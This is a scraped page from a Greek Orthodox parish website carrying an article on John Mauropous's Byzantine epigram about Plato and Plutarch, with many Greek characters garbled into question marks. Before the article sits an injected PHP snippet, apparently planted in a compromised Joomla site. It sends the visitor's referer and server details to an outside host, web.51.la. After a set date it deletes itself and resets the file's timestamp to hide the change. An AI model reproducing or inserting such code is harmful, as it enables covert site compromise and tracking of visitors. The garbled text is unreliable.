check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Άγιος Δημήτριος Νέου Φαλήρου - Τα νέα μας

Create PDF Recommend Print

Άγιος Δημήτριος Νέου Φαλήρου - Τα νέα μας

? ?κκλησία καί ο? ?ρχα?οι

Το? Σεβασμιωτάτου Μητροπολίτου Χίου, Ψαρ?ν καί Ο?νουσσ?ν κ. Μάρκου

 

 

?να ?πίγραμμα το? ?ωάννη Μαυρόποδα:

«ε?περ τινός βούλοιο τ?ν ?λλοτρίων

τ?ς σ?ς ?πειλ?ς ?ξελέσθαι, Χριστέ μου,

Πλάτωνα καί Πλούταρχον ?ξέλοιό μοι,

?μφω γάρ ε?σι καί λόγον καί τόν τρόπον

το?ς σο?ς νόμοις ?γγιστα προσπεφυκότες,

ε? δ' ?γνόησαν ?ς Θεός ε? τ?ν ?λων,

?ντα?θα τ?ς σ?ς χρηστότητος δε? μόνον

δι' ?ν ?παντας δωρεάν σ?ζειν θέλεις».

Μετάφραση: «?ν θέλεις γιά κάποιους ?πό τούς ?λλοθρήσκους νά κάνεις μιά ?ξαίρεση ?πό τήν ?πειλή σου, Χριστέ μου, νά μο? ?ξαιρέσεις τόν Πλάτωνα καί τόν Πλούταρχο, γιατί καί ο? δύο ?ταν καί στήν θεωρία καί στόν τρόπο ζω?ς στούς νόμους σου ?π' ?λους πιό πιστοί καί ?ν ?γνοο?σαν ?τι ?σύ ε?σαι ? Θεός τ?ν πάντων, τότε χρειάζονται μόνο τήν καλωσύνη σου πού σέ κάνει νά χαρίζεις σέ ?λους τή σωτηρία».

? ?ωάννης Μαυρόπους (11ος α?.) Μητροπολίτης Ε?χαΐτων τ?ς Μικρ?ς ?σίας κοντά στόν ?λυ ποταμό, ε?ναι ?πό τούς διαπρεπεστέρους ποιητές το? Βυζαντίου καί ?πό τούς κυριωτέρους ?κπροσώπους το? ?ερο? ?πιγράμματος. ?ριστος ?κκλησιαστικός ρήτορας καί λαογράφος. ?νθρωπιστής πού συνέβαλε στήν ?ναδιοργάνωση το? Πανεπιστημίου τ?ς Κωνσταντινουπόλεως, ?που ?πηρέτησε καί ? ?διος ?ς Καθηγητής τ?ς Φιλοσοφίας. ?π?ρξε δάσκαλος σπουδαίων ?νδρ?ν το? α??νά του, ?πως ? Ξιφιλίνος καί ? Μιχαήλ Ψελλός, ? ?πο?ος τόν ?παινε? ?ς «λογιώτατον πάντων ?νδρ?ν, ?ριστον τ?ν φιλοσοφε?ν ?σπουδακότων... τό ?θος σεμνόν ?μο? καί Σωκρατικόν καί ο?τε κοινόν ?γαν ο?τε μόνως ε?ρωνικόν, ?λλ' ?μφοτέρωθεν κεκραμένον καί τήν ?ρμονίαν τ?ς ψυχ?ς δικαιώτατον». Συνετέλεσε στήν κωδικοποίηση τ?ν λειτουργικ?ν Βιβλίων, διορθώνοντας τά Μηνα?α. Συνέθεσε πολυάριθμους Κανόνες, 70 στήν Θεοτόκο, 25 στόν Χριστό, 11 στόν Πρόδρομο, 8 στόν ?ωσήφ τόν ?μνογράφο, ?κολουθία τ?ν Τρι?ν ?εραρχ?ν καί στιχηρά ?διόμελα. Τά ?πιγράμματά του, θύραθεν καί ?ερά, γιά τά ?πο?α κατέχει ?διαίτερη θέση στήν ?στορία τ?ς βυζαντιν?ς λογοτεχνίας, ?πτονται πολλ?ν ?πικαίρων θεμάτων. ? ?διος ε?χε συνείδηση τ?ς ποιητικ?ς του τέχνης καί παρεσκεύασε μόνος τήν ?κδοση μέρους τ?ν ποιήσεών του ?ν ε?δει ?νθολογίας. Ε?χε ?νεργό ?νάμειξη στά πολιτικά καί προσπάθησε νά ?πηρεάσει τόν α?τοκράτορα Κωνσταντ?νο Θ΄. ?γραψε, ?κόμη, βίους ?γίων, ?πιστολές καί ?να ?μμετρο ?τυμολογικό λεξικό. ?σχολήθηκε καί μέ τίς φυσικές ?πιστ?μες καί τά μαθηματικά. ? ?κκλησία τόν τιμ? στίς 5 ?κτωβρίου, μολονότι δέν ?πάρχει σέ Συναξαριστές. ?πάρχει μόνο στόν Παλατινό Κώδικα ?π' ?ρ. 138, φ. 2146 ?που ε?ρίσκεται καί ? ?κολουθία του, πού συντάχθηκε ?πό τόν ?νεψιό του Θεόδωρο τόν Κοιτωνίτη καί βασιλικό νοτάριο.

Τό ?πίγραμμα γιά τόν Πλάτωνα καί τόν Πλούταρχο ?χει ?κδοθε? μέ ?ριθμό 43 στό Ρ. De Lagarde, Iohannis Euchaitorum Metropolitae, quae in codice Vaticano Graeco 676 Supersunt. Gottingen 1882, σελ. 24. ? Krumbacher τό χαρακτηρίζει «?πίγραμμα ε?ς τόν Πλάτωνα καί Πλούταρχον ?ξαίρετον διά τήν ε?γεν? ?νεξιθρησκείαν». Σ' α?τό ? Μαυρόπους παρακαλε? τόν Χριστό νά παράσχει τήν Χάρη Του στόν Πλάτωνα καί τόν Πλούταρχο, ?πειδή α?τοί ?ς ?θνικοί, ε?χαν πλησιάσει περισσότερο τή χριστιανική ?θική. ?ποτελε?ται ?πό 8 στίχους σέ βυζαντινό δωδεκασύλλαβο. ? πρ?τος, τρίτος καί πέμπτος στίχος ?χουν ?φθημιμερ? τομή ? παύση (Π7), ?ν? ο? λοιποί πενθημιμερ? (Π5). Κανονική ε?ναι παροξύτονη ?πόλιξη τ?ν στίχων καί μάλιστα μέ βραχεία τήν τονιζομένη παραλήγουσα. Τό ?πίγραμμα διατρέχεται ?πό μία ?πιεικ? θεωρία γιά τόν ?ρχα?ο κόσμο καί τά ?ρχα?α κείμενα. ? Μαυρόπους, πιστός στά διδάγματα τ?ς ?κκλησίας, κάνει μιά νέα σύνθεση μέσα στό πνε?μα το? α??να πού σιγο?ν τά πάθη. Στούς νάρθηκες τ?ν Μον?ν, ?πως ?κείνης τ?ν Φιλανθρωπιν?ν στά ?ωάννινα, ?πεικονίζουν τούς ?ρχαίους σοφούς. Ε?ναι «?λλότριοι», δηλαδή μέτοχοι τ?ς θύραθεν παιδείας. Κυριώτεροι ?θικολόγοι ο? σοφοί πού ?ναφέρονται στό ?πίγραμμα. Ε?ναι «προσπεφυκότες», ?π' τή φύση τους πολύ κοντά στό νόμο το? Χριστο?, «?γγιστα», ?χι ?κριβ?, γιατί δέν ?φθασαν στή χριστιανική ?λήθεια καί ?γάπη. Στά κείμενά τους ? ?κκλησία διέκρινε σπέρματα το? λόγου το? Χριστο?, «σπερματικός λόγος», γι'α?τό καί τούς χαρακτηρίζει ?ς πρό Χριστο? Χριστιανούς. Τό ?πίγραμμα α?τό δεικνύει τόν τρόπο μέ τόν ?πο?ο ? Χριστιανικός κόσμος ?ξετίμησε τό ?θος τ?ν άρχαίων συγγραφέων.

*

Βιβλιογραφία

Κ. Krumbacher: ?στορία Βυζ. Λογοτεχνίας

H. Hunger:Βυζ. Λογοτεχνία.

?θ. Κομίνη:Τό Βυζ. ?ερόν ?πίγραμμα

 

Παντρεύεστε;

apokatastash steghs

Βαπτίζετε το παιδί σας;

Γίνεσται ανάδοχος;